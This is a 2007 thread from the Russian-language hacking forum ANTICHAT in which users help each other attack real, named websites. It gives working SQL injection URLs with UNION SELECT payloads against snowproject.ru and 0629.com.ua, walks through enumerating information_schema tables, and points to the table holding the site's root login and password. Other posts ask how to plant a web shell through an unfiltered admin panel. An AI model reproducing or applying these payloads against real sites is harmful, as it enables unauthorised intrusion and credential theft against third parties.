ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.10.2007, 11:29
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974
Репутация:
1
|
|
Подскажите что делать дальше
_http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,4,5,6,7/*
Читал мануалы, но немогу угадать название базы.
|
|
|
07.10.2007, 11:55
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Вначале определяем версию.
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,version(),5,6,7/*
Ура 5 мускул!
Дальше проще....
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,table_name,5,6,7%20from%20inf ormation_schema.tables%20limit%200,1/*
limit 1,1 , limit 2,1 ... и т.д.
Исследуем структуру базы.... дальше по обстоятельствам.
|
|
|
|
07.10.2007, 12:47
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974
Репутация:
1
|
|
Мэн поясни поподробней плиз, что теперь мне это даёт и как сформировать запрос на user  ass.
0 - CHARACTER_SETS
1 - COLLATIONS
3 - COLUMNS
4 - COLUMN_PRIVILEGES
5 - KEY_COLUMN_USAGE
6 - PROFILING
7 - ROUTINES
8 - SCHEMATA
9 - SCHEMA_PRIVILEGES
10 - STATISTICS
11 - TABLES
12 - TABLE_CONSTRAINTS
13 - TABLE_PRIVILEGES
14 - TRIGGERS
15 - USER_PRIVILEGES
16 - VIEWS
17 - banners
18 - contacts
19 - djs
20 - gen_sets |
|
|
|
07.10.2007, 13:12
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Все лежит в таблице gen_sets тама есть нужные тебе поля login и password
нужный тебе юзер в данном случае - root
пароль - найди сам  , а то ведь так не интересно. И еще тебе нужно найти куда это подставить.
З.Ы. Я нашел и проверил. Работает.
З.З.Ы. И еще.... почитай мануалы внимательней, а то ты писал что читаешь....
Последний раз редактировалось Red_Red1; 07.10.2007 в 13:19..
|
|
|
|
07.10.2007, 19:36
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974
Репутация:
1
|
|
То Red_Red1 - Респект, спасибо!
|
|
|
|
09.10.2007, 22:28
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440
Репутация:
96
|
|
есть жоступ к админке, но могу только добавлять новости\статьи. при этом ничего не фильтруется. можно как-нибудь залить шелл?
|
|
|
|
10.10.2007, 00:22
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Ну ты б поподробнее описал все: мож эта известная цмска, есть ли возможность заливать картинки или прекреплять файлы и т.д.
__________________
Карфаген должен быть разрушен...
|
|
|
|
13.10.2007, 08:03
|
|
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992
Репутация:
-1
|
|
http://www.0629.com.ua/view_news.php?id_news=
Прописываю: http://www.0629.com.ua/view_news.php?id_news=http://mail.ru
Пишет: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://mail.ru' at line 1
Можно ли как нибудь загрузить шелл?
|
|
|
|
13.10.2007, 12:15
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 WebeX
По поводу шелла - мое мнение нельзя. Но тама есть скуля в другом скрипте
http://www.0629.com.ua/news.php?cat=-7+union+select+1,2,3,4,database(),version(),7,8,9, 10,11,12,13,14,15,user(),17,18,19,20,21,22/*
Однако с реализацией будут сложности - у пользователя под которым выполняется скрипт нету доступа ко всем таблицам. Например я пытался обратиться к таблице форума forum.phpbb_users, пишет доступ запрещен. Есть админка сайта /admin/ но таблицы я не нашел, да и туда наверное закрыт доступ....
|
|
|
|
14.10.2007, 08:07
|
|
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992
Репутация:
-1
|
|
Сообщение от Red_Red1
2 WebeX
По поводу шелла - мое мнение нельзя. Но тама есть скуля в другом скрипте
http://www.0629.com.ua/news.php?cat=-7+union+select+1,2,3,4,database(),version(),7,8,9, 10,11,12,13,14,15,user(),17,18,19,20,21,22/*
Однако с реализацией будут сложности - у пользователя под которым выполняется скрипт нету доступа ко всем таблицам. Например я пытался обратиться к таблице форума forum.phpbb_users, пишет доступ запрещен. Есть админка сайта /admin/ но таблицы я не нашел, да и туда наверное закрыт доступ....
+, у меня тоже знакомый пробовал но так и ничего пока не вышло, его заблочили, вернее его ИП
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид